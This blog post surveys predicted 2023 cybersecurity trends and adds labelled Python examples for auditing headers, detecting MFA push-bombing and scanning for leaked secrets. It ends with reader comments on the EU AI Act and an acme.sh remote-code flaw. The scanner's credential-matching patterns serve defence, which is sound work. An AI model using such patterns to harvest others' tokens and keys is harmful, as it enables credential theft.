Nothing is more difficult than making predictions, especially in the fast-advancing cyber security field. Instead of throwing out wild ideas about what might be coming, I have collected here some trends that many people and publications have predicted for 2023.
HTTPS: These days HTTPS has effectively become the default transport for web browsing. Most notably, the Chrome browser now marks any older HTTP website as “Not Secure” in the address bar. Chrome also attempts to “upgrade” to the HTTPS version of a website if you accidentally navigate to the insecure version. If a secure version isn’t available, an on-screen warning is shown, asking if you would like to continue. As HTTPS has become more common across the web, Google Chrome is preparing to launch a security option that will block “insecure” downloads over HTTP in the Chrome browser.
Malvertising: Cyber criminals will keep impersonating brands using search engine advertisement services to defraud users in 2023. The FBI is warning US consumers that cybercriminals are placing ads in search engine results that impersonate well-known brands, in an attempt to spread ransomware and steal financial information. Cybercriminals are purchasing ads that show up at the very top of search engine results, often purporting to link to a legitimate company’s website. However, anyone clicking on the link is instead taken to a lookalike page that may appear identical, but is in fact designed to phish for login credentials and financial details, or even trick the unwary into downloading ransomware. The FBI has advised consumers to use ad blockers to protect themselves from such threats.
Encrypted malware: The vast majority of malware arrives over encrypted connections, typically HTTPS web sessions. The vast majority of cyber-attacks over the past year have used TLS/SSL encryption to hide from security teams, traditional firewalls and many other security tools: Over 85% of Attacks Hide in Encrypted Channels, and the WatchGuard Threat Lab Report Finds Top Threat Arriving Exclusively Over Encrypted Connections. If you are not inspecting encrypted traffic when it enters your network, you will not be able to detect most malware at the network level. Hopefully you at least have endpoint protection implemented, for a chance to catch it further down the cyber kill chain.
Software vulnerabilities: Weak configurations for encryption and missing security headers will still be very common in 2023. In 2022 nearly every application had at least one vulnerability or misconfiguration that affects security, and a quarter of application tests found a highly or critically severe vulnerability. Read more at Misconfigurations, Vulnerabilities Found in 95% of Applications.
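As an added example (not code from this article or from any of the publications it cites), here is a small audit function for the “missing security headers” misconfiguration mentioned above; it also checks the HSTS max-age that backs the HTTPS-by-default behaviour described under HTTPS. The header set, the one-year threshold and the two sample responses are this example’s own constructed assumptions, not a formal standard.

```python
# Added example: audit one HTTP response's headers for the common
# "missing security header" misconfigurations. Header list, thresholds and
# the two sample responses are this example's own constructed choices.
from typing import Dict, List

# Headers a hardened HTTPS site is normally expected to send, with the reason.
EXPECTED_HEADERS = {
    "strict-transport-security": "HSTS: browsers keep using HTTPS even if a user types http://",
    "content-security-policy": "CSP: restricts where scripts and other resources may load from",
    "x-content-type-options": "stops MIME sniffing (should be 'nosniff')",
    "x-frame-options": "mitigates clickjacking (or use CSP frame-ancestors)",
    "referrer-policy": "limits leaking URLs to third parties",
}

ONE_YEAR_SECONDS = 31536000


def _parse_hsts_max_age(value: str) -> int:
    """Return max-age from an HSTS header value, or -1 if absent or invalid."""
    for directive in value.split(";"):
        name, _, number = directive.strip().partition("=")
        if name.strip().lower() == "max-age":
            try:
                return int(number.strip().strip('"'))
            except ValueError:
                return -1
    return -1


def audit_headers(headers: Dict[str, str]) -> List[str]:
    """Return a list of human-readable findings for one response's headers."""
    lower = {k.lower(): v for k, v in headers.items()}   # header names are case-insensitive
    findings = []
    for name, why in EXPECTED_HEADERS.items():
        if name not in lower:
            findings.append(f"missing {name} ({why})")
    hsts = lower.get("strict-transport-security")
    if hsts is not None and _parse_hsts_max_age(hsts) < ONE_YEAR_SECONDS:
        findings.append("weak strict-transport-security: max-age below one year")
    xcto = lower.get("x-content-type-options")
    if xcto is not None and xcto.strip().lower() != "nosniff":
        findings.append("x-content-type-options is set but not 'nosniff'")
    return findings


# Constructed sample responses (not captured from any real site).
WEAK_RESPONSE = {
    "Content-Type": "text/html",
    "Strict-Transport-Security": "max-age=300",
}
HARDENED_RESPONSE = {
    "Content-Type": "text/html",
    "Strict-Transport-Security": "max-age=63072000; includeSubDomains",
    "Content-Security-Policy": "default-src 'self'",
    "X-Content-Type-Options": "nosniff",
    "X-Frame-Options": "DENY",
    "Referrer-Policy": "strict-origin-when-cross-origin",
}

if __name__ == "__main__":
    for label, resp in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_headers(resp) or ["no findings"])
```

In practice the dictionary would come from the response of an HTTP client; the checks themselves are deliberately simple so that the list of expected headers can be extended per site.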
Old vulnerabilities: You will see attackers try to use old vulnerabilities again in 2023 because they work. Attackers will take the path of least resistance, and as long as vendors don’t consistently perform thorough root-cause analysis when fixing security vulnerabilities, it will continue to be worth investing time in trying to revive known vulnerabilities before looking for novel ones. Many companies do not patch their systems in a reasonable time, or at all, so they stay vulnerable. New variations of old vulnerabilities are also developed: approximately 50% of the observed 0-days in the first half of 2022 were variants of previously patched vulnerabilities.
Security gaps: There are still big gaps in companies’ cyber security. The rapid advancement of technology in all industries has led to the threat of ever-increasing cyberattacks that target businesses, governments, and individuals alike. Lack of knowledge, neglected maintenance of employees’ skills and indifference are the strongest obstacles to the development of many companies’ cyber security. While security screening and limiting who has access to your data are both important aspects of personnel security, they will only get you so far.
Cloud: At a hyperscale cloud provider there can potentially be several thousand people, working around the globe, who could access your data. Security screening and access limiting alone still leave a significant risk of malicious or accidental access to data. Instead, you should expect your cloud provider to take a more layered approach.
MFA: MFA fatigue attacks are putting your organization at risk in 2023. Multi-factor auth fatigue is real. A common threat targeting businesses is the MFA fatigue attack, a technique where a cybercriminal attempts to gain access to a corporate network by bombarding a user with MFA prompts until they finally accept one. This attempt can be successful, especially when the target victim is distracted or overwhelmed by the notifications or mistakes them for legitimate authentication requests. It’s a huge threat because it bypasses one of the most effective security measures.
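An added detection example, not from this article or the reports it cites: a sliding-window check over MFA push events that flags a user who receives many prompts in a short time, and records whether one of those prompts was then approved, which is the outcome a defender most wants to see early. The log format, field names, threshold and window are assumptions constructed for this example; a real identity provider’s logs need their own parser.

```python
# Added example: toy detector for MFA push-bombing. The log format, threshold
# and window below are constructed for this example, not taken from any IdP.
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Dict, Tuple

# Constructed sample log, one event per line:
#   <ISO timestamp> user=<name> event=<push_sent|push_denied|push_approved> ip=<addr>
SAMPLE_LOG = """
2023-01-10T08:00:01 user=alice event=push_sent ip=203.0.113.5
2023-01-10T08:00:20 user=alice event=push_denied ip=203.0.113.5
2023-01-10T08:00:45 user=alice event=push_sent ip=203.0.113.5
2023-01-10T08:01:10 user=alice event=push_sent ip=203.0.113.5
2023-01-10T08:01:40 user=alice event=push_sent ip=203.0.113.5
2023-01-10T08:02:05 user=alice event=push_sent ip=203.0.113.5
2023-01-10T08:02:30 user=alice event=push_approved ip=203.0.113.5
2023-01-10T08:00:05 user=bob event=push_sent ip=198.51.100.7
2023-01-10T08:00:15 user=bob event=push_approved ip=198.51.100.7
2023-01-10T09:30:00 user=bob event=push_sent ip=198.51.100.7
"""


def parse_line(line: str) -> Tuple[datetime, str, str, str]:
    """Split one constructed log line into (timestamp, user, event, ip)."""
    ts_text, rest = line.split(" ", 1)
    fields = dict(part.split("=", 1) for part in rest.split())
    return datetime.fromisoformat(ts_text), fields["user"], fields["event"], fields["ip"]


def detect_push_bombing(log_text: str, threshold: int = 4,
                        window: timedelta = timedelta(minutes=5)) -> Dict[str, dict]:
    """Flag users who received >= threshold push prompts inside one sliding window.

    Returns {user: {"first_push": datetime, "pushes": int, "approved_after_burst": bool}}.
    Events are assumed to be in time order per user.
    """
    recent = defaultdict(deque)   # per-user timestamps of pushes inside the window
    alerts: Dict[str, dict] = {}
    for line in log_text.strip().splitlines():
        ts, user, event, _ip = parse_line(line)
        if event == "push_sent":
            q = recent[user]
            q.append(ts)
            while ts - q[0] > window:          # drop pushes that fell out of the window
                q.popleft()
            if user in alerts:
                alerts[user]["pushes"] += 1
            elif len(q) >= threshold:
                alerts[user] = {"first_push": q[0], "pushes": len(q),
                                "approved_after_burst": False}
        elif event == "push_approved" and user in alerts:
            # The dangerous outcome: the user finally accepted a prompt they did not start.
            alerts[user]["approved_after_burst"] = True
    return alerts


if __name__ == "__main__":
    for user, info in detect_push_bombing(SAMPLE_LOG).items():
        print(f"{user}: {info['pushes']} pushes from {info['first_push']}, "
              f"approved after burst: {info['approved_after_burst']}")
```

The approval after a burst is what should page an analyst; a burst without approval is still worth a call to the user, since it usually means the password is already known to someone else.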
Passwords: Passwords will not go away completely, even though new solutions to replace them will be pushed to users. When you create passwords or passphrases, make them good and long enough to be secure. Including a comma character in the password can make it harder for cyber criminals to use it if for some reason it leaks out. The reason is that a comma in a password can confuse tabular comma-separated values (CSV) files, which are a common way to collect and distribute stolen passwords.
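An added example (not from this article or the Finnish source it cites) of what a comma in a password actually does to a CSV dump. It shows both sides of the argument: a naive comma-joined dump read back with `split(",")` does mangle the record, while a dump written with a real CSV writer quotes the field and round-trips intact, so the comma is a nuisance for sloppy tooling rather than a substitute for length. The credentials are constructed placeholders.

```python
# Added example: a comma in a password versus naive and proper CSV handling.
# All credentials below are constructed placeholders.
import csv
import io
from typing import Callable, List


def naive_dump(rows: List[List[str]]) -> str:
    """Join fields with commas and no quoting (what the article's argument assumes)."""
    return "\n".join(",".join(row) for row in rows)


def naive_parse(text: str) -> List[List[str]]:
    """Split each line on every comma, so a comma inside a field adds a column."""
    return [line.split(",") for line in text.splitlines()]


def proper_dump(rows: List[List[str]]) -> str:
    """Write with the csv module, which quotes any field containing a comma."""
    buf = io.StringIO()
    csv.writer(buf, lineterminator="\n").writerows(rows)
    return buf.getvalue()


def proper_parse(text: str) -> List[List[str]]:
    """Read with the csv module, which honours the quoting."""
    return list(csv.reader(io.StringIO(text)))


# Constructed sample records: one passphrase contains commas, one does not.
SAMPLE_ROWS = [
    ["alice@example.test", "correct,horse,battery"],
    ["bob@example.test", "hunter2"],
]


def fields_survive(dump: Callable[[List[List[str]]], str],
                   parse: Callable[[str], List[List[str]]],
                   rows: List[List[str]] = SAMPLE_ROWS) -> bool:
    """True when every row comes back unchanged after a dump-and-parse round trip."""
    return parse(dump(rows)) == rows


if __name__ == "__main__":
    print("naive tooling keeps the records intact:", fields_survive(naive_dump, naive_parse))
    print("naive parse of alice's row:", naive_parse(naive_dump(SAMPLE_ROWS))[0])
    print("csv module keeps the records intact:", fields_survive(proper_dump, proper_parse))
```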
EU: The Network and Information Security (NIS) Directive was the first piece of EU-wide legislation on cybersecurity; its successor is Network and Information Security 2, also known as NIS2. Rules requiring EU countries to meet stricter supervisory and enforcement measures and harmonise their sanctions were approved by MEPs in late 2022. They will start to affect security decisions in 2023. The new rules set tighter cybersecurity obligations for risk management, reporting and information sharing. The requirements cover incident response, supply chain security, encryption and vulnerability disclosure, among other provisions. The new rules will also protect so-called “important sectors” such as postal services, waste management, chemicals, food, manufacturing of medical devices, electronics, machinery, motor vehicles and digital providers. All medium-sized and large companies in the selected sectors will fall under the legislation. The NIS Directive has already impacted the cybersecurity budgets of operators over the past year, with deep-dives into the Energy and Health sectors: Cybersecurity Investments in the EU: Is the Money Enough to Meet the New Cybersecurity Standards?
USA: CISA has released cross-sector cybersecurity performance goals (CPGs) in response to President Biden’s 2021 National Security Memorandum on improving cybersecurity for critical infrastructure control systems. Since then, the CPGs have been regarded by the cybersecurity community as “the floor” and “a baseline” for cybersecurity hygiene and practices. Many organizations overlook OT as part of their cybersecurity strategy, keeping their focus solely on IT systems. Especially in the critical infrastructure sectors, overlooking OT can pose serious risks to all operations. As a result, the released CPGs are explicitly scoped to include OT devices.
Android: Android security will advance in 2023 in many ways. Android is adding support for updatable root certificates in the next Android 14 release. Google Play now lets children send purchase requests to guardians.
Losing trust: The world’s biggest tech companies have lost confidence in one of the Internet’s behind-the-scenes gatekeepers. Microsoft, Mozilla, and Google are dropping TrustCor Systems as a root certificate authority in their products.
Need for better communication: At a time when less than a fifth (18%) of risk and compliance professionals profess to be very confident in their ability to clearly communicate risk to the board, it’s clear that lines of communication—not to mention understanding—must be improved.
Supply chain risks: Watch for geopolitical instability to continue to be a governance issue, particularly with the need to oversee third-party and supply chain risk.
Privacy and data protection: Privacy and data protection are the big story for compliance officers in 2023, with expanding regulations soon expected to cover five billion citizens.
Business risks: In 2023, business risks will run the gamut: geopolitical volatility, talent management, DEI (Diversity, Equity, and Inclusion), ESG (Environmental, Social, and Governance), IT security amid continued remote and hybrid work, and business continuity amid the threat of large-scale operational and utility interruptions. There is also the challenge that executives take more cybersecurity risks than office workers: leaders engage in more dangerous behavior and are four times more likely to be victims of phishing than office workers.
Integrated Risk Management: Look for risk to be increasingly viewed as a driver of business performance and value as digital landscapes and business models evolve. Forward-looking companies will embed integrated risk management (IRM) into their business strategy, so they can better understand the risks associated with new strategic initiatives and be able to pivot as necessary. Keep in mind that Executives take more cybersecurity risks than office workers.
Zero trust: Many people think that Zero Trust is a pretty optimal security practice in 2023. It is good for new systems that its model suits, but Zero Trust also has challenges. Incorporating zero trust into an existing network can be very expensive. The Zero Trust Shouldn’t Be The New Normal article says that the zero trust model starts to erode when the resources of two corporations need to play together nicely. Federated activity, ranging from authentication to resource-pooled cloud federation, doesn’t coexist well with zero trust. To usefully emulate the kind of informed trust model that humans use every day, we need to flip the entire concept of zero trust on its head. In order to do that, network interactions need to be evaluated in terms of risk. That’s where identity-first networking comes in. In order for a network request to be accepted, it needs both an identity and explicit authorization; System for Cross-domain Identity Management (SCIM) based synchronization is used to achieve this. This securely automates the exchange of a user identity between cloud applications, diverse networks, and service providers.
Poor software: There will be a lot of poor software in use in 2023 and it will cost lots of money. Poor software costs the US 2.4 trillion: cyberattacks due to existing vulnerabilities, complex issues involving the software supply chain, and the growing impact of rapidly accumulating technical debt have led to a build-up of historic software deficiencies.
Microsoft: Microsoft will permanently turn off Exchange Online basic authentication starting in early January 2023 to improve security. A future Microsoft Edge update will permanently disable the Internet Explorer 11 desktop web browser on some Windows 10 systems in February. This means that “The out-of-support Internet Explorer 11 (IE11) desktop application is scheduled to be permanently disabled on certain versions of Windows 10 devices on February 14, 2023, through a Microsoft Edge update, not a Windows update as previously communicated”.
Google Workspace: Google Workspace Gets Client-Side Encryption in Gmail. The long-awaited client-side encryption for Gmail is available in beta.
Google is letting businesses try out client-side encryption for Gmail, but it’s probably not coming to personal accounts anytime soon. Google has already enabled optional client-side encryption for many Workspace services.
Passkeys: Google has made passkey support available in the stable version of Chrome. Passkeys use biometric verification to authenticate users and are meant to replace the use of passwords, which can be easily compromised. Passkeys are usable cross-platform with both applications and websites. Passkeys offer the same experience that password autofill does, but provide the advantage of passwordless authentication. They cannot be reused, don’t leak in server breaches, and protect users from phishing attacks. Passkeys are only available for websites that provide support for them, via the WebAuthn API.
War risks: Watch for the war between Russia and Ukraine to continue in both the real world and the cyber world in 2023. Cyber is as important as missile defences, says an ex-NATO general. The risk of escalation from cyber attacks has never been greater. A cyber attack on the German ports of Bremerhaven or Hamburg would severely impede NATO efforts to send military reinforcements to allies, retired U.S. General Ben Hodges told Reuters.
Cloud takeover: AWS Elastic IP Transfer Feature Gives Cyberattackers Free Range
Threat actors can take over victims’ cloud accounts to steal data, or use them for command-and-control for phishing attacks, denial of service, or other cyberattacks.
ICS: ICS and SCADA systems remain trending attack targets in 2023.
Code security: Microsoft-owned code hosting platform GitHub has just announced multiple security improvements, including free secret scanning for public repositories and mandatory two-factor authentication (2FA) for developers and contributors. The secret scanning program is meant to help developers and organizations identify exposed secrets and credentials in their code. In 2022, code scanning helped identify 1.7 million potential secrets exposed in public repositories. Now the feature is available for free for all public repositories, to help prevent secret exposures and secure the open source ecosystem. With secret scanning alerts, you can track and act on leaked secrets directly within GitHub.
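An added illustration, not GitHub’s scanner: a pattern-based secret scanner of the kind that runs in CI or a pre-commit hook, with an entropy filter so that placeholder values do not raise alerts. The regexes are simplified forms of well-known token shapes, the entropy threshold is this example’s own choice, and the sample source file is constructed (the AWS key in it is the value AWS uses in its own documentation, not a live credential).

```python
# Added example: a small pattern-plus-entropy secret scanner. Patterns are
# simplified token shapes chosen for this example; the sample file is constructed.
import math
import re
from typing import List, Tuple

PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    # Assignments such as password = "..." / api_key: '...' with an 8+ char value.
    "generic_assignment": re.compile(
        r"(?i)(?:password|passwd|secret|api[_-]?key|token)\s*[:=]\s*[\"']([^\"']{8,})[\"']"),
}


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; random-looking secrets score high."""
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def scan(source: str, min_entropy: float = 3.0) -> List[Tuple[int, str, str]]:
    """Return (line_number, finding_type, matched_value) for each probable secret."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        specific_values = set()
        for kind, pattern in PATTERNS.items():       # specific patterns run before generic
            for m in pattern.finditer(line):
                value = m.group(1) if m.groups() else m.group(0)
                if kind == "generic_assignment":
                    # Skip values already reported by a specific pattern, and
                    # low-entropy placeholders such as "changeme".
                    if value in specific_values or shannon_entropy(value) < min_entropy:
                        continue
                else:
                    specific_values.add(value)
                findings.append((lineno, kind, value))
    return findings


# Constructed sample file; nothing in it is a live credential.
SAMPLE_SOURCE = """\
# constructed sample config for the scanner demo
AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
github_token = "ghp_0123456789abcdefghijklmnopqrstuvwxyz"
db_password = "changeme"
api_key = "q7Z9xT2mL0pV4sW8bN1cR6yK3hJ5dF0a"
"""

if __name__ == "__main__":
    for lineno, kind, value in scan(SAMPLE_SOURCE):
        print(f"line {lineno}: {kind}: {value[:8]}...")
```

Real scanners add provider-specific validation (checksums, live verification against the issuer) to cut false positives further; the entropy gate here is the cheapest version of that idea.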
Data destruction: We must develop a cloud-compatible way of doing destruction that meets security standards. Maybe cloud providers can come up with a service to provide this capability, since only they have direct access to the underlying hardware. They have never been shy about inventing new services to charge for, and certainly plenty of companies would be eager to pay for such a service, if the appropriate certificates of destruction were provided.
PCI DSS: PCI DSS 4.0 should be on your radar in 2023 if you work in a field that needs to meet it. The latest version of the standard will bring a new focus to an overlooked yet critically important area of security. For a long time, client-side threats, which involve security incidents and breaches that occur on the customer’s computer rather than on the company’s servers or in between the two, were disregarded. But that’s changing with the release of PCI DSS 4.0. Now, many new requirements focus on client-side security.
SHA-1: NIST retires the SHA-1 cryptographic algorithm; not fully in 2023, but preparations for the phase-out start. The venerable cryptographic hash function has vulnerabilities that make its further use inadvisable. According to NIST, SHA-1 ‘has reached the end of its useful life’, given that the high computing capabilities of today’s systems can easily attack the algorithm using a technique referred to as a ‘collision’ attack. SHA-1, whose initials stand for secure hash algorithm, has been in use since 1995 as part of the Federal Information Processing Standard, and NIST has announced that SHA-1 should be phased out by Dec. 31, 2030, in favor of the more secure SHA-2 and SHA-3 groups of algorithms. The US National Institute of Standards and Technology (NIST) recommended that IT professionals start replacing the 27-year-old SHA-1 cryptographic algorithm with newer, more secure ones. Because SHA-1 is used as the foundation of numerous security applications, the phase-out period will take many years. Tech giants such as Google, Facebook, Microsoft and Mozilla have already taken steps to move away from the SHA-1 cryptographic algorithm. Certificate authorities stopped issuing certificates using SHA-1 as of January 1, 2017.
Cloud: Is Cloud Native Security Good Enough? Cloud native technologies enable organizations to tap into the agility required to keep up in the current competitive landscape and to create new business models. But achieving efficient, flexible, distributed and resilient cloud native security is tough. All major public cloud providers (Amazon Web Services (AWS), Microsoft Azure and Google Cloud) of course offer security features and services, which are designed to address significant threats to cloud-based data. However, in spite of this, public cloud providers’ security tools commonly fail to meet operational needs, and their limitations should prompt organizations to consider or reconsider how they are protecting public cloud environments.
Privacy: The Privacy War Is Coming. Privacy standards are only going to increase. It’s time for organizations to get ahead of the coming reckoning.
Ethical hacking: Ethical hacking has become a highly sought-after career route for emerging tech aspirants. The role of ethical hackers enables countless businesses and individuals to improve their security posture and minimize the potential attack risk for organizations. But there are several analysts who believe that becoming a self-taught ethical hacker in 2023 might not be worth it, because they are at constant risk of failing to perform properly and many companies might not want to hire a self-taught ethical hacker.
MFA: Two factor authentication might not be enough in 2023 for applications that need good security. In the past few months, we’ve seen an unprecedented number of identity theft attacks targeting accounts protected by two-factor authentication (2FA), challenging the perception that existing 2FA solutions provide adequate protection against identity theft attacks. So for some demanding users 2FA is over. Long live 3FA!
Cloud APIs: With Cloud Comes APIs & Security Headaches, also in 2023. Web application programming interfaces (APIs) are the glue that holds together cloud applications and infrastructure, but these endpoints are increasingly under attack, with half of companies acknowledging an API-related security incident in the past 12 months. According to a survey conducted by Google Cloud, the most troublesome security problems affecting companies’ use of APIs are security misconfigurations, outdated APIs and components, and spam or abuse bots. About 40% of companies are suffering an incident due to misconfiguration and a third are coping with the latter two issues. Two-thirds of companies (67%) found API-related security issues and vulnerabilities during the testing phase, but more than three-quarters (77%) have confidence that they will catch issues, saying they have the required API tools and solutions.
Lack of cyber security workers: Businesses need to secure their assets and ensure the continuous readiness of employees to respond to a cyberattack if they want to move forward safely and avoid losses caused by cybercriminals or malicious attackers. There is an acute shortage of cyber security professionals. As Threat Levels remain high, companies and organizations remain on alert – but face ongoing challenges in finding and retaining the right people with the required skill levels. There is a significant skills gap and a clear need for hiring cyber security experts in organizations across the world.
VPN: Is Enterprise VPN on Life Support or Ripe for Reinvention? While enterprise VPNs fill a vital role for business, they have several limitations. To get work-from-anywhere initiatives off the ground quickly and keep their business afloat, many organizations turned to enterprise virtual private networks (VPNs). This allowed them to connect their remote employees to critical business operations at the corporate site. However, as fast as VPNs were deployed, organizations learned their limitations and security risks. So are traditional VPNs really “dead” as some industry analysts and pundits claim? Or do they simply need a refresh? Time will tell, and this will be discussed in 2023.
AI: Corporations have discovered the power of artificial intelligence (A.I.) to transform what’s possible in their operations.
But with great promise comes great responsibility—and a growing imperative for monitoring and governance. “As algorithmic decision-making becomes part of many core business functions, it creates the kind of enterprise risks to which boards need to pay attention.”
AI dangers: Large AI language models have potential dangers. AI is better at fooling humans than ever—and the consequences will be serious. A Wired magazine article expects that in 2023 we may well see our first death by chatbot. Causality will be hard to prove: was it really the words of the chatbot that put the murderer over the edge? Or perhaps a chatbot has broken someone’s heart so badly they felt compelled to take their own life?
Metaverse: Police Must Prepare For New Crimes In The Metaverse, Says Europol. It encourages law enforcement agencies to start considering the ways in which existing types of crime could spread to virtual worlds, while entirely new crimes could start to appear. Read the Policing in the metaverse: what law enforcement needs to know report for more information.
Blockchain: Digital products like cryptocurrency and blockchain will affect a company’s risk profile. Boards and management will need to understand these assets’ potential impact and align governance with their overall risk and business strategies. The year 2022 already showed how many cryptocurrency-related risks were realized. More “Crypto travel rules” are being enacted to combat money laundering and terrorism financing.
Insurance: Getting cyber insurance can become harder and more expensive in 2023. Insurance executives have been increasingly vocal in recent years about systemic risks, and now cyber is the risk to watch. Spiralling cyber losses in recent years have prompted emergency measures by the sector’s underwriters to limit their exposure. There is growing concern among industry executives about large-scale strikes. As well as pushing up prices, some insurers have responded by tweaking policies so clients retain more losses. There are already insurance policies written in the market that have an exemption for state-backed attacks, but the difficulty of identifying those behind attacks and their affiliations makes such exemptions legally fraught. The chief executive of one of Europe’s biggest insurance companies has warned that cyber attacks, rather than natural catastrophes, will become “uninsurable” as the disruption from hacks continues to grow. Recent attacks have disrupted hospitals, shut down pipelines and targeted government departments. “What if someone takes control of vital parts of our infrastructure, the consequences of that?” In September, the US government called for views on whether a federal insurance response to cyber was warranted.
Sources:
An expert advises using a comma in your password – there is a clever logic behind it
Overseeing artificial intelligence: Moving your board from reticence to confidence
Android is adding support for updatable root certificates amidst TrustCor scare
Google Play now lets children send purchase requests to guardians
Diligent’s outlook for 2023: Risk is the trend to watch
Microsoft will turn off Exchange Online basic auth in January
Google is letting businesses try out client-side encryption for Gmail
Google Workspace Gets Client-Side Encryption in Gmail
The risk of escalation from cyberattacks has never been greater
Client-side encryption for Gmail available in beta
AWS Elastic IP Transfer Feature Gives Cyberattackers Free Range
Microsoft: Edge update will disable Internet Explorer in February
Is Cloud Native Security Good Enough?
Top Reasons Not to Become a Self-Taught Ethical Hacker in 2023
Google Chrome preparing an option to block insecure HTTP downloads
Cyber attacks set to become ‘uninsurable’, says Zurich chief
The Dark Risk of Large Language Models
Police Must Prepare For New Crimes In The Metaverse, Says Europol
Policing in the metaverse: what law enforcement needs to know
Cyber as important as missile defences – an ex-NATO general
Misconfigurations, Vulnerabilities Found in 95% of Applications
Personnel security in the cloud
Multi-factor auth fatigue is real – and it’s why you may be in the headlines next
MFA Fatigue attacks are putting your organization at risk
NIS2 approved – stricter cyber security requirements for EU countries
Cybersecurity Investments in the EU: Is the Money Enough to Meet the New Cybersecurity Standards?
Poor software costs the US 2.4 trillion
Passkeys Now Fully Supported in Google Chrome
Google Takes Gmail Security to the Next Level with Client-Side Encryption
Executives take more cybersecurity risks than office workers
NIST Retires SHA-1 Cryptographic Algorithm
NIST to Retire 27-Year-Old SHA-1 Cryptographic Algorithm
WatchGuard Threat Lab Report Finds Top Threat Arriving Exclusively Over Encrypted Connections
Over 85% of Attacks Hide in Encrypted Channels
GitHub Announces Free Secret Scanning, Mandatory 2FA
Leaked a secret? Check your GitHub alerts…for free
Data Destruction Policies in the Age of Cloud Computing
Why PCI DSS 4.0 Should Be on Your Radar in 2023
Google: With Cloud Comes APIs & Security Headaches
Digesting CISA’s Cross-Sector Cybersecurity Performance Goals
Zero Trust Shouldn’t Be The New Normal
Don’t click too quick! FBI warns of malicious search engine ads
FBI Recommends Ad Blockers as Cybercriminals Impersonate Brands in Search Engine Ads
Cyber Criminals Impersonating Brands Using Search Engine Advertisement Services to Defraud Users
There is an acute shortage of cyber security professionals
1,768 Comments
Tomi Engdahl says:
https://www.securityweek.com/in-other-news-linux-kernel-exploits-update-on-bec-losses-cybersecurity-awareness-act/
European Parliament votes in favor of AI Act
Despite last week’s concerns over the future of the EU AI Act, the European Parliament has voted in favor — by 499 to 28, with 93 abstentions. The details still have to be agreed by the European Council (representing the national governments) and the European Commission — and there is likely to be some pushback from both; for example, in policing areas. As it stands, the law is heavily focused on people (privacy and personal rights), potentially outlawing areas such as emotion detection, and predictive policing. It also provides greater transparency over AI data content; for example, restrictions on the use of copyright material. The Act contrasts with Google’s SAIF proposals: the former concentrates on the content, while the latter concentrates on the technology.
AI Act enters final phase of EU legislative process
https://www.euractiv.com/section/artificial-intelligence/news/ai-act-enters-final-phase-of-eu-legislative-process/
The European Parliament adopted its position on the AI rulebook with an overwhelming majority on Wednesday (14 June), paving the way for the interinstitutional negotiations set to finalise the world’s first comprehensive law on Artificial Intelligence.
The AI Act is a flagship initiative to regulate this disruptive technology based on its capacity to cause harm. It follows a risk-based approach, banning AI applications that pose an unacceptable risk and imposing a strict regime for high-risk use cases.
“Is this the right time to regulate AI? My answer is resolutely yes. It is the right time because of the profound impact that AI has,” Dragoș Tudorache, one of the European Parliament’s co-rapporteurs on the AI Act, told his peers ahead of the vote.
Banned practices
Where to draw a line on the types of AI applications that should be forbidden was at the centre of the last-minute attempts to change the text adopted at the parliamentary committee level.
The main point of contention related to Remote Biometric Identification. Liberal and progressive lawmakers sought to ban the real-time use of this technology but allow it for ex-post investigations on serious crimes.
By contrast, the centre-right European People’s Party tried to introduce derogations to the real-time ban for exceptional circumstances such as terrorist attacks or missing people. This last-minute attempt enraged the other political groups but was eventually unsuccessful.
However, a parliamentary official told EURACTIV that the point of plenary amendments is not always to modify the text but to send a political message.
Foundation models & generative AI
The EU lawmakers introduced a tiered approach for AI models that do not have a specific purpose, so-called General Purpose AI, with a stricter regime for foundation models, large language models on which other AI systems can be built.
The top layer relates to generative AI like ChatGPT, for which the European Parliament wants to introduce mandatory labelling for AI-generated content and force the disclosure of training data covered by copyright.
With ChatGPT, generative AI caught mass attention, and the European Commission has launched outreach initiatives attempting to anticipate the AI rules and foster international alignment at the G7 level.
On these initiatives, leading MEP Brando Benifei warned that they “could become a context where the businesses will act to influence the legislative work,” which is now the focus of the lobbying efforts to water down the regulation. “But if we cooperate correctly between the institutions, this will be prevented.”
The list of prohibited practices was extended to subliminal techniques, biometric categorisation, predictive policing and internet-scraped facial recognition databases, and emotion recognition software is forbidden in law enforcement, border management, workplace and education.
An extra layer was added for AI applications to fall in the high-risk category, whilst the list of high-risk areas and use cases were made more precise and extended in law enforcement and migration control areas. Recommender systems of prominent social media were added as high-risk.
AI Act: MEPs close in on rules for general purpose AI, foundation models
https://www.euractiv.com/section/artificial-intelligence/news/ai-act-meps-close-in-on-rules-for-general-purpose-ai-foundation-models/
Google Introduces SAIF, a Framework for Secure AI Development and Use
https://www.securityweek.com/google-introduces-saif-a-framework-for-secure-ai-development-and-use/
The Google SAIF (Secure AI Framework) is designed to provide a security framework or ecosystem for the development, use and protection of AI systems.
Tomi Engdahl says:
https://hackaday.com/2023/06/15/the-simplest-social-engineering-hack-of-them-all/
Tomi Engdahl says:
This Week In Security: ACME.sh, Leaking LEDs, And Android Apps
https://hackaday.com/2023/06/16/this-week-in-security-acme-sh-leaking-leds-and-android-apps/
Let’s Encrypt has made an enormous difference to the landscape of the web. The protocol used for authenticating and receiving certificates, ACME, has spawned quite a few clients of various flavors. Some are written in Rust, some in Python or Go, and a few in straight Bash shell script. One of those last ones, acme.sh, was doing something odd when talking to a particular “Certificate Authority”, HiCA. This pseudo-CA only supports acme.sh, and now we know why. The folks behind HiCA found an RCE exploit in acme.sh, and decided to use that exploit to do certificate issuance with more “flexibility”. Oof.
The nuts and bolts here are that HiCA was working as a CA-in-the-Middle, wrapping other CAs’ authentication services. Those services don’t support ACME authentication at all, and HiCA used the acme.sh vulnerability to put the authentication token in the place SSL.com expected to find it. So, just a good community member offering a service that ACME doesn’t quite support, right?
The takeaway is twofold. First, as an end user, only use reputable CAs. And second, ACME clients need to be hardened against potentially malicious CAs.
acme.sh runs arbitrary commands from a remote server
